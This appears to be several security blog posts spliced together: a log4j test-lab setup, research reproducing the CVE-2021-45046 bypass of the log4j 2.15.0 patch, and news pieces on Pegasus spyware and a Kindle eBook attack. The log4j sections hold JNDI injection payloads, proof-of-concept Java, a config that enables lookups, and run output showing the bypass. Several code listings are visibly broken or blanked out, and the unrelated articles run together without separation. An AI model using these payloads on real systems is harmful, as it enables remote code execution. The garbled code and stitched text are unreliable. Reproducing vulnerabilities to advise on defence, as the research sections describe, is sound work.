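To quickly confirm which side of these cutoffs a given JDK falls on, you can print the Java version together with the codebase-trust property. A minimal sketch (the fallback message is ours; the property is normally unset and the JDK-internal default applies):

```java
public class JdkCheck {
    public static void main(String[] args) {
        // The exact JDK build determines whether remote LDAP codebases are trusted
        System.out.println("java.version = " + System.getProperty("java.version"));
        // Normally unset: on JDKs newer than 8u191/11.0.1 the internal default is false
        System.out.println("trustURLCodebase = " + System.getProperty(
                "com.sun.jndi.ldap.object.trustURLCodebase", "unset (JDK default applies)"));
    }
}
```

Running this inside the container or VM is a quick sanity check that you actually got the vulnerable JDK build you asked for.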

In the example below you will see how easy it is to download JDK 8u171 and jump right into it:

Linux Virtual Machine

Alternatively, if you prefer to set up the testing environment directly on a Linux server, it is still relatively easy. You can go to the Java SE archive and select the version of Java that you need (we recommend the tar.gz format).

Once the version is downloaded, it is just a matter of extracting the archive, as shown below:

user@ubuntu:~/poc$ ll -Ah
total 183M
-rw-rw-r-- 1 user user 183M Dec 20 02:13 jdk-8u171-linux-x64.tar.gz

user@ubuntu:~/poc$ tar zxvf jdk-8u171-linux-x64.tar.gz

user@ubuntu:~/poc$ ll -Ah
total 183M
drwxr-xr-x 8 user user 4.0K Mar 28  2018 jdk1.8.0_171/
-rw-rw-r-- 1 user user 183M Dec 20 02:13 jdk-8u171-linux-x64.tar.gz

user@ubuntu:~/poc$ ./jdk1.8.0_171/bin/java -version
java version "1.8.0_171"
Java(TM) SE Runtime Environment (build 1.8.0_171-b11)
Java HotSpot(TM) 64-Bit Server VM (build 25.171-b11, mixed mode)

Windows Virtual Machine

Unlike the previous two options, downloading Java on a Windows system without actually installing it is slightly more involved. It starts the same way, by downloading the desired version of Java from the Java SE archive, but rather than installing it we will have to perform a few extra steps.

As initially described by Igor on Stack Overflow:

Step 1: Download and install 7zip

Step 2: Unarchive the executable “jdk-XuXX-windows-x64.exe” with 7zip, as shown below:

Step 3: Run extrac32 111 within the .rsrc\1033\JAVA_CAB10 folder, as shown below:

Step 4: Extract the “” archive in the same folder using 7zip

Step 5: Run for /r %x in (*.pack) do .\bin\unpack200 -r "%x" "%~dx%~px%~nx.jar" within the newly created “tools” folder, as shown below:

Step 6: Recursively copy the contents of the “tools” folder to a location where JDK would be located; in the screenshot below the new folder would be C:\jdk-8u171.

Step 7: Verify that Java has been installed successfully:

2. Building the Vulnerable Application

With a working server, the next step is to download the version of log4j to be used for testing. This can be achieved by downloading the library (tar.gz or zip) from Apache’s archive.

In our case, that was version 2.14.1 of log4j, as shown below:

user@ubuntu:~/poc$ wget -q
user@ubuntu:~/poc$ tar zxf apache-log4j-2.14.1-bin.tar.gz 
user@ubuntu:~/poc$ ls -l apache-log4j-2.14.1-bin/log4j-{api,core}-2.14.1.jar
-rw-r--r-- 1 user user  300364 Mar  6  2021 apache-log4j-2.14.1-bin/log4j-api-2.14.1.jar
-rw-r--r-- 1 user user 1745701 Mar  6  2021 apache-log4j-2.14.1-bin/log4j-core-2.14.1.jar

Once that is completed, the next step is to either recreate the application you are targeting, or build a simple dummy one to work on the attack against. A short piece of code that invokes the vulnerability is included below:

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class POC {
    public static void main(String[] args) {
        Logger logger = LogManager.getLogger(POC.class);
        logger.error("${jndi:ldap://}");
    }
}

To compile the script, it is important to include both the “core” and the “api” libraries:

user@ubuntu:~/poc$ ./jdk1.8.0_171/bin/javac -cp apache-log4j-2.14.1-bin/log4j-core-2.14.1.jar:apache-log4j-2.14.1-bin/log4j-api-2.14.1.jar

To run the script, it is once again required to include both libraries as well as the current folder:

user@ubuntu:~/poc$ ./jdk1.8.0_171/bin/java -cp apache-log4j-2.14.1-bin/log4j-core-2.14.1.jar:apache-log4j-2.14.1-bin/log4j-api-2.14.1.jar:. POC
14:27:56.562 [main] ERROR POC - ${jndi:ldap://}

Note that the vulnerable application hangs once executed, as an LDAP request is made in the background and needs to time out.
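If the hang gets in the way of quick iteration, the JNDI LDAP provider honours connect and read timeout properties. A sketch, with the two-second values being our own choice; the properties must be set (or passed as -D flags) before the lookup is triggered:

```java
public class TimeoutSetup {
    public static void main(String[] args) {
        // Cap how long the JNDI LDAP provider waits for a TCP connect (milliseconds)
        System.setProperty("com.sun.jndi.ldap.connect.timeout", "2000");
        // Cap how long it waits for an LDAP response (milliseconds)
        System.setProperty("", "2000");
        System.out.println("LDAP timeouts capped at "
                + System.getProperty("com.sun.jndi.ldap.connect.timeout") + " ms");
    }
}
```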

3. Testing the Proof-Of-Concept

At this point, the last element needed to complete the basic research environment is visibility over the network traffic. Ideally, that would be a custom LDAP/DNS/RMI server providing a clear indication of each request and any metadata it carries, as well as control over the data sent back to the vulnerable application. However, much of that can be achieved with a simple packet analyser showing whether a request is being made, even if nothing is sent back. In many cases that is enough to prove whether the application is (still) vulnerable.

We would recommend Wireshark, as it makes it easy to see the different protocols and is very intuitive for applying filters (unlike tcpdump). With it running (do not forget to execute it with elevated privileges) and listening on all interfaces, you should be able to rerun the POC script and see the network traffic, as shown below:

That concludes our small testing environment for log4j. In our next blog post, we will focus on exploiting the vulnerability and researching different patching methods.

The NSO Group’s private spyware has been used to target the cellphones of human rights activists and journalists around the world. Data has revealed that the Israeli spyware can infect smartphones without any user interaction (no “clicks”). Human rights advocates throughout the world have condemned the intrusive spyware, which continues to endanger and jeopardize human lives.

Source of the Spyware 

One extensive investigation reveals that the NSO Group, an Israeli IT contractor, is responsible for creating the invasive spyware known as Pegasus. The spyware bypasses security controls through a smartphone’s apps or operating system and, ultimately, tracks personal and sensitive information.

The Washington Post also reports that the malicious Israeli spyware has been able to hack into the cellphones of reputable public officials, human rights activists, and journalists without their consent. It is fair to say that this intrusive form of surveillance will have drastic consequences for free speech, data privacy, and human rights.

In the Name of Cybersecurity Intelligence 

The stance of the NSO Group, however, is that it operates as a cybersecurity intelligence firm and supports government initiatives to prevent online crime and terrorism. But since the release of the investigation, the targeted individuals want the company to acknowledge the issue. In fact, Human Rights Watch notes that the NSO Group has had affiliations with regressive regimes and public actors that undermine basic human rights.

Forensic Analysis of Spyware 

The forensic analysis from Amnesty International paints a clear picture of the severity and implications of the spyware. Amnesty International’s Security Lab found that the spyware is often delivered to smartphones through suspicious URL links, allowing it to track cellphone activity once the user clicks. In some cases, however, hidden URLs mean that simply visiting a previously compromised website is sufficient to infect users (an attack known as a “watering hole”).

iOS Vulnerability and Past Accusations Against the NSO Group

Forbes highlights that the Israeli spyware took advantage of an iOS vulnerability, disguising itself as a system upgrade to invade a specific user’s mobile phone. At that point, the user is completely unaware of any spyware presence on his or her phone. Some time back, another investigation, from WhatsApp, also accused the NSO Group in connection with illegal government surveillance and spyware.

In fact, this research suggests that NSO has been at the centre of many cybersecurity issues around the world. Digital rights activists have called for the Israeli tech firm to be held accountable and for efforts to mitigate the impact of the dangerous spyware, because a Pegasus intrusion into a personal smartphone is highly dangerous for human rights activists.

Complete Breach of Privacy 

The Guardian reports that after the infiltration of the cellphone, hackers can access anything on the device. For instance, hackers can read sent and received messages, record the screen, turn on the microphone and camera, and check GPS history to find the user’s exact location. These cyberattacks have the backing of oppressive regimes that want to curtail political opposition and free speech.

Final Thoughts 

As of now, Pegasus has managed to compromise more than 50,000 cellphone devices. Data suggests that human rights activists from countries like India, Mexico, Saudi Arabia, and Azerbaijan were the main targets and are now at high risk. To protect human rights defenders and ensure digital safety, global rights groups are calling for more accountability from tech companies. Human Rights Watch wants to make sure that regressive governments don’t silence dissidents by criminalizing online association and expression.

The most recent event concerning Pegasus spyware involves Apple. The manufacturer has distributed a patch for a critical vulnerability by rolling out security updates to all of its affected iPhones. Since the malware first appeared, Pegasus has received extensive coverage from international media and governments.

Reports allege that Pegasus spyware is illegally spying on human rights activists, heads of state, and journalists through their iPhones. With our near-total dependence on the Internet and tech gadgets, relying on them for personal and commercial tasks is no longer safe.

On a global scale, there is a collaborative investigation involving Pegasus spyware. Experts insist that it is one of the most dangerous attacks targeted towards smartphones. 

Roots of Pegasus 

Pegasus is the top-of-the-line spyware of the Israeli NSO Group. The company offers cyber intelligence solutions for state-backed law enforcement and intelligence agencies. The Washington Post confirms that the group offers its services to 60 different governments around the world.   

Mechanics of Pegasus 

Attackers send an email or text message to a targeted cell phone. Once the victim opens the message or email, the Pegasus Spyware gets access without any need for user interaction (i.e., clicks). The attacker can then download additional modules on the cell phone and transmit surveillance information.  

Whether it’s Android or iOS, Pegasus spyware does not require a click to be executed. It appears the spyware can infiltrate any type of phone from any location. Once attackers gain remote access to the phone, they can activate virtual surveillance.

Ultimately, Pegasus spyware focuses on zero-day vulnerabilities: flaws in the smartphone’s operating system that either haven’t been fixed by the vendor or for which the user has not applied the patches. In the span of a few months, Pegasus managed to exploit and backdoor millions of iPhones. At the time of writing, Apple plans to roll out continuous software updates to avoid future attacks.

What Exactly Can Pegasus Do?

Once the spyware gets into a smartphone, there is practically nothing users can do to stop it. The attacker can see all the photos, videos, emails, contact lists, SMS messages, and call records, and can use the phone’s GPS to track the target’s movements.

Reports also confirm that Pegasus spyware can activate the camera and microphone on the phone; in layman’s terms, it turns a cell phone into a surveillance tool. In the case of iPhones, attackers used Pegasus to obtain administrative (root) privileges, after which they can do everything the owner can on the device.

Targeted Software 

In the last two years, there has been a dramatic increase in malware attacks on different types of devices. Pegasus spyware uses a new infiltration technique that doesn’t require clicks or depend on pre-installed (vulnerable) software, and it can exploit a smartphone without the user’s knowledge.

Final Thoughts 

In late 2021, more details continued to startle tech experts about Pegasus spyware. Experts profess that the spyware is (almost) impossible to identify: despite modern protections and the use of advanced electronic devices, Pegasus leaves no trace of infiltration whatsoever. The newer versions of the spyware run from the smartphone’s temporary memory.

So, when users switch off their phones, any trace of the spyware infiltration is completely gone. Until leading cybersecurity specialists figure out how to detect the spyware, it is crucial to offer support to users who may be victims of this particular malware.

Very shortly after the release of the patch for CVE-2021-44228, bundled by Apache as log4j 2.15.0, researchers found ways of bypassing the fix: CVE-2021-45046. In less than a couple of days a bypass was discovered, and while it was initially rated 3.7, it was later elevated to 9.0. Needless to say, it captured our attention, especially considering the incident response work we were conducting at the time; it was important for us to understand the situation to better advise our clients. Bits and pieces of research, with some screenshots of the bypass, were circulating the Internet, but at the time we could not find a vulnerable environment with a good explanation and well laid out prerequisites for the bypass to work.

This blog goes over the research we performed, from start to finish, to produce a PoC and, in the process, to understand precisely the conditions that have to be present to successfully bypass the log4j 2.15.0 patch.

Tracking the Changes

To start with, we downloaded the vulnerable 2.14.1 log4j library, as well as the patched 2.15.0:

user@ubuntu:~/poc$ wget -q
user@ubuntu:~/poc$ tar zxf apache-log4j-2.14.1-src.tar.gz 
user@ubuntu:~/poc$ wget -q 
user@ubuntu:~/poc$ tar zxf apache-log4j-2.15.0-src.tar.gz 
user@ubuntu:~/poc$ ls -lh
total 22M
drwxr-xr-x 42 user user 4.0K Mar  6  2021 apache-log4j-2.14.1-src
-rw-rw-r--  1 user user  11M Mar 11  2021 apache-log4j-2.14.1-src.tar.gz
drwxr-xr-x 45 user user 4.0K Dec  9 10:19 apache-log4j-2.15.0-src
-rw-rw-r--  1 user user  12M Dec  9 15:46 apache-log4j-2.15.0-src.tar.gz

With both folders ready, we used meld to have an easier time finding what was different in the log4j-core folder:

Reviewing only the modified files, we noticed interesting changes in the JndiManager class:

private static final String LDAP = "ldap";
private static final String LDAPS = "ldaps";
private static final String JAVA = "java";
private static final List<String> permanentAllowedHosts = NetUtils.getLocalIps();
private static final List<String> permanentAllowedClasses = Arrays.asList(Boolean.class.getName(),
        Byte.class.getName(), Character.class.getName(), Double.class.getName(), Float.class.getName(),
        Integer.class.getName(), Long.class.getName(), Short.class.getName(), String.class.getName());
private static final List<String> permanentAllowedProtocols = Arrays.asList(JAVA, LDAP, LDAPS);
public synchronized <T> T lookup(final String name) throws NamingException {
  try {
    URI uri = new URI(name);
    if (uri.getScheme() != null) {
      if (!allowedProtocols.contains(uri.getScheme().toLowerCase(Locale.ROOT))) {
        LOGGER.warn("Log4j JNDI does not allow protocol {}", uri.getScheme());
        return null;
      }
      if (LDAP.equalsIgnoreCase(uri.getScheme()) || LDAPS.equalsIgnoreCase(uri.getScheme())) {
        if (!allowedHosts.contains(uri.getHost())) {
          LOGGER.warn("Attempt to access ldap server not in allowed list");
          return null;
        }
        Attributes attributes = this.context.getAttributes(name);
        if (attributes != null) {
          Map<String, Attribute> attributeMap = new HashMap<>();
          NamingEnumeration<? extends Attribute> enumeration = attributes.getAll();
          while (enumeration.hasMore()) {
            Attribute attribute =;
            attributeMap.put(attribute.getID(), attribute);
          }
          Attribute classNameAttr = attributeMap.get(CLASS_NAME);
          if (attributeMap.get(SERIALIZED_DATA) != null) {
            if (classNameAttr != null) {
              String className = classNameAttr.get().toString();
              if (!allowedClasses.contains(className)) {
                LOGGER.warn("Deserialization of {} is not allowed", className);
                return null;
              }
            } else {
              LOGGER.warn("No class name provided for {}", name);
              return null;
            }
          } else if (attributeMap.get(REFERENCE_ADDRESS) != null || attributeMap.get(OBJECT_FACTORY) != null) {
            LOGGER.warn("Referenceable class is not allowed for {}", name);
            return null;
          }
        }
      }
    }
  } catch (URISyntaxException ex) {
    LOGGER.warn("Invalid JNDI URI - {}", name);
    return null;
  }
  return (T) this.context.lookup(name);
}

Assuming we were able to reach the same lookup function, our payload would need to comply with two new conditions: 1) it has to use one of the allowed protocols, and 2) when using ldap or ldaps, it has to point to a host present in the allowed hosts list.

We managed to find a bit more information for these properties in the documentation:

ALLOWED_PROTOCOLS By default the JDNI Lookup only supports the java, ldap, and ldaps protocols or no protocol. Additional protocols may be supported by specifying them on the “log4j2.allowedJndiProtocols” property.

ALLOWED_HOSTS System property that adds host names or ip addresses that may be access by LDAP. When using LDAP only references to the local host name or ip address are supported along with any hosts or ip addresses listed in the “log4j2.allowedLdapHosts” property.
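In other words, both lists can be extended via system properties, either as -D flags on the command line or programmatically before log4j initialises. A sketch with illustrative values (the host below is our own example, not from the patch):

```java
public class AllowListSetup {
    public static void main(String[] args) {
        // Must be set before LogManager is first used, otherwise the defaults
        // (java/ldap/ldaps and local IPs only) have already been loaded
        System.setProperty("log4j2.allowedJndiProtocols", "dns");
        System.setProperty("log4j2.allowedLdapHosts", "");
        System.out.println("Allowed extra protocols: "
                + System.getProperty("log4j2.allowedJndiProtocols"));
    }
}
```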

To verify this, we also looked at the source code. The default “allowed protocols” were:

private static final String LDAP = "ldap";
private static final String LDAPS = "ldaps";
private static final String JAVA = "java";
private static final List<String> permanentAllowedProtocols = Arrays.asList(JAVA, LDAP, LDAPS);

Whereas the default “allowed hosts” were listed in the getLocalIps function in log4j-core/src/main/java/org/apache/logging/log4j/core/util/

public static List<String> getLocalIps() {
  List<String> localIps = new ArrayList<>();
  try {
    final InetAddress addr = Inet4Address.getLocalHost();
    setHostName(addr, localIps);
  } catch (final UnknownHostException ex) {
    // Ignore this.
  }
  try {
    final Enumeration<NetworkInterface> interfaces = NetworkInterface.getNetworkInterfaces();
    if (interfaces != null) {
      while (interfaces.hasMoreElements()) {
        final NetworkInterface nic = interfaces.nextElement();
        final Enumeration<InetAddress> addresses = nic.getInetAddresses();
        while (addresses.hasMoreElements()) {
          final InetAddress address = addresses.nextElement();
          setHostName(address, localIps);
        }
      }
    }
  } catch (final SocketException se) {
      // ignore.
  }
  return localIps;
}

Testing Assumptions

At this point, we had some assumptions as to what the patch had introduced. We decided to go ahead and try to confirm them with a practical test.

First, we modified the PoC we wrote in our previous blog into something easier to use:

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class POC {
    private static final Logger logger = LogManager.getLogger(POC.class);

    public static void main(String[] args) {
        if (args.length > 0) {
            System.out.println("Using payload: " + args[0]);
            logger.error(args[0]);
        } else {
            System.out.println("No payload provided...");
        }
    }
}
After that we compiled it and ran it:

user@ubuntu:~/poc$ ./jdk1.8.0_171/bin/javac -cp apache-log4j-2.15.0-bin/log4j-core-2.15.0.jar:apache-log4j-2.15.0-bin/log4j-api-2.15.0.jar 
user@ubuntu:~/poc$ ./jdk1.8.0_171/bin/java -cp apache-log4j-2.15.0-bin/log4j-core-2.15.0.jar:apache-log4j-2.15.0-bin/log4j-api-2.15.0.jar:. POC '${jndi:dns://}'
Using payload: ${jndi:dns://}
15:06:32.118 [main] ERROR POC - ${jndi:dns://}

While we were not expecting to see a DNS request in Wireshark, there should at least have been an error indicating that our protocol and host were not allowed; however, there was nothing.

Our assumption was wrong: there had to be more changes that we were not aware of. We tried with “log4j2.formatMsgNoLookups=true”, as this was mentioned in the patch, but it didn’t change anything; there was no DNS or TCP outbound traffic, nor any additional errors. Because of this we went back to the documentation and stumbled upon the following:

Pattern layout no longer enables lookups within message text by default for cleaner API boundaries and reduced formatting overhead. The old ‘log4j2.formatMsgNoLookups’ which enabled this behavior has been removed as well as the ‘nolookups’ message pattern converter option. The old behavior can be enabled on a per-pattern basis using ‘%m{lookups}’.

A quick check with meld against /log4j-core/src/main/java/org/apache/logging/log4j/core/pattern/ revealed that there was no longer a flag we could enable for lookups unless the option was included in the config file.

With this in mind, we had to create a config file with a custom pattern and use it:

<?xml version="1.0" encoding="UTF-8"?>
<Configuration status="WARN">
    <Appenders>
        <Console name="Console" target="SYSTEM_OUT">
            <PatternLayout pattern="%d{HH:mm:ss.SSS} - $${ctx:myContext} - %msg%n" />
        </Console>
    </Appenders>
    <Loggers>
        <Root level="error">
            <AppenderRef ref="Console"/>
        </Root>
    </Loggers>
</Configuration>
We also updated the POC so that the payload is placed in the thread context:

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.apache.logging.log4j.ThreadContext;

public class POC {
    private static final Logger logger = LogManager.getLogger(POC.class);

    public static void main(String[] args) {
        if (args.length > 0) {
            System.out.println("Using payload: " + args[0]);
            ThreadContext.put("myContext", args[0]);
            logger.error(args[0]);
        } else {
            System.out.println("No payload provided...");
        }
    }
}

With these changes, we decided to test again with a slightly modified payload:

user@ubuntu:~/poc$ ./jdk1.8.0_171/bin/java -cp log4j-core-2.15.0.jar:log4j-api-2.15.0.jar:. POC '${jndi:ldap://}'
Using payload: ${jndi:ldap://}
2021-12-27 16:27:49,981 main WARN Attempt to access ldap server not in allowed list
16:27:49.976 - ${jndi:ldap://} - ${jndi:ldap://}

We then ran it again to verify that we could use the other enabled protocols as well:

user@ubuntu:~/poc$ ./jdk1.8.0_171/bin/java -cp log4j-core-2.15.0.jar:log4j-api-2.15.0.jar:. POC '${java:version}'
Using payload: ${java:version}
17:31:52.159 - Java version 1.8.0_171 - ${java:version}

At this point we knew we were reaching the lookup function, and it became just a matter of bypassing the newly introduced checks.

Final Challenge

We then hit a big problem: the bypass we saw on Twitter, ${jndi:ldap://}, was not working for us. The application was crashing, complaining that it could not resolve the host due to the # in the domain. To get around this, we had to use a different DNS resolver that was not so picky about special characters.

Here we have a PoC of this:

user@ubuntu:~/poc$ ./jdk1.8.0_171/bin/java -cp log4j-core-2.15.0.jar:log4j-api-2.15.0.jar:. \
>,sun POC '${jndi:ldap://}'
Using payload: ${jndi:ldap://}
2021-12-24 02:45:36,290 main WARN Error looking up JNDI resource [ldap://]. javax.naming.CommunicationException: [Root exception is]

With this, we were able to reproduce the attack and once again be in a position to achieve RCE.
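The reason a # payload can slip past the new host check lies in how parses such a name: the fragment separator terminates the authority component, so getHost() returns only the allowed-looking prefix, while the JNDI LDAP provider can still end up resolving the full string. A small illustration with made-up hosts (the real payload domain is redacted above):

```java

public class UriTrick {
    public static void main(String[] args) throws URISyntaxException {
        // '#' ends the authority, so only "" is treated as the host
        URI uri = new URI("ldap://");
        System.out.println("host = " + uri.getHost());         // passes the allow-list check
        System.out.println("fragment = " + uri.getFragment()); // the attacker-controlled remainder
    }
}
```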

Our research concluded that several important requirements have to be present to bypass the 2.15.0 patch. The most important ones are: 1) the ability to write within a context that 2) is used within a custom pattern in the application, 3) combined with a broad DNS resolver.

In 2021, cybersecurity issues continue to loom over corporations. Throughout the COVID-19 pandemic, many organizations had to transition to remote work. As a result, cyberattacks are at an all-time high, with a rapid increase in malicious actors seeking to breach and exploit valuable data for financial gain.

In a line of new attacks, the Israeli cybersecurity firm Check Point spotted a threat on Amazon. The malware infection was triggered through eBook clicks: after clicking on specific eBook links, users lost complete control of their Amazon account as well as their Kindle tablet.

Complete Access Control 

The Israeli cybersecurity experts state that the security breach allowed hackers to access users’ tablets and gain control of their Amazon accounts. Other specialists suggest that stealing users’ e-reader Amazon accounts may have been just the tipping point.

Check Point demonstrated its full findings at DEFCON. It is no secret that FBI agents and top-tier cybersecurity companies from around the world attend the annual DEFCON convention in Las Vegas; it is, after all, one of the largest cybersecurity conventions in the world.

The findings at DEFCON revealed that hackers could breach and exploit a Kindle when users opened a specific eBook and clicked on it. In fact, it took only seconds for the hackers to gain access to the user’s Kindle.

Examining the Attack Surface 

One cyber researcher points out that the Kindle is a misunderstood product, like other IoT devices. Contrary to this misguided perception, the Kindle does in fact need strong security to prevent and mitigate future breaches. In the end, all devices that connect to the internet need to be secure by design.

Like most broadminded firms, Amazon recognized the severity of the breach. In fact, Amazon worked with the Israeli cybersecurity company to mitigate the impact of the breach and took measures to avoid a similar attack in the foreseeable future.

Planned and Calculated

This cybersecurity threat proves that hackers don’t hold back, whether the target is a small firm or a giant online marketplace like Amazon; in fact, the target is always planned and calculated. As technology continues to reshape modern workplace environments and organizations, it has become imperative to curb known and unknown cyber threats.

In this case, Amazon had the resources and a dedicated IT team in place to thwart the cybersecurity attack. But there is still a need for organizations to spend more on cybersecurity solutions and become more responsive.